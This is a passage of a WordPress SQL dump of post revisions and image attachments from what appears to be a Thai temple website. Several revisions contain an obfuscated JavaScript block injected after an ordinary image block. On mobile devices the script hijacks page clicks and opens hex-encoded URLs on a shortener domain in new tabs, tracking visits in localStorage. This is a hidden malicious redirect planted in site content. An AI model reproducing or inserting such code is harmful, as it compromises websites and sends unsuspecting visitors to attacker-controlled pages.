_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:28:56','2024-08-30 03:28:56','',306,'http://watprato.ssk.in.th/?p=308',0,'revision','',0),
(310,2,'2024-08-30 10:32:20','2024-08-30 03:32:20','','messageImage_1724923827910','','inherit','open','closed','','messageimage_1724923827910-2','','','2024-08-30 10:32:20','2024-08-30 03:32:20','',306,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/messageImage_1724923827910-1.jpg',0,'attachment','image/jpeg',0),
(311,2,'2024-08-30 10:35:30','2024-08-30 03:35:30','','ปลูกต้นไม้','','inherit','open','closed','','%e0%b8%9b%e0%b8%a5%e0%b8%b9%e0%b8%81%e0%b8%95%e0%b9%89%e0%b8%99%e0%b9%84%e0%b8%a1%e0%b9%89','','','2024-08-30 10:35:30','2024-08-30 03:35:30','',306,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้.jpg',0,'attachment','image/jpeg',0),
(312,2,'2024-08-30 10:36:10','2024-08-30 03:36:10','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-724x1024.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:36:10','2024-08-30 03:36:10','',306,'http://watprato.ssk.in.th/?p=312',0,'revision','',0),
(313,2,'2024-08-30 10:36:12','2024-08-30 03:36:12','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-724x1024.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:36:12','2024-08-30 03:36:12','',306,'http://watprato.ssk.in.th/?p=313',0,'revision','',0),
(315,2,'2024-08-30 10:37:35','2024-08-30 03:37:35','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"thumbnail\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-thumbnail\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-150x150.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'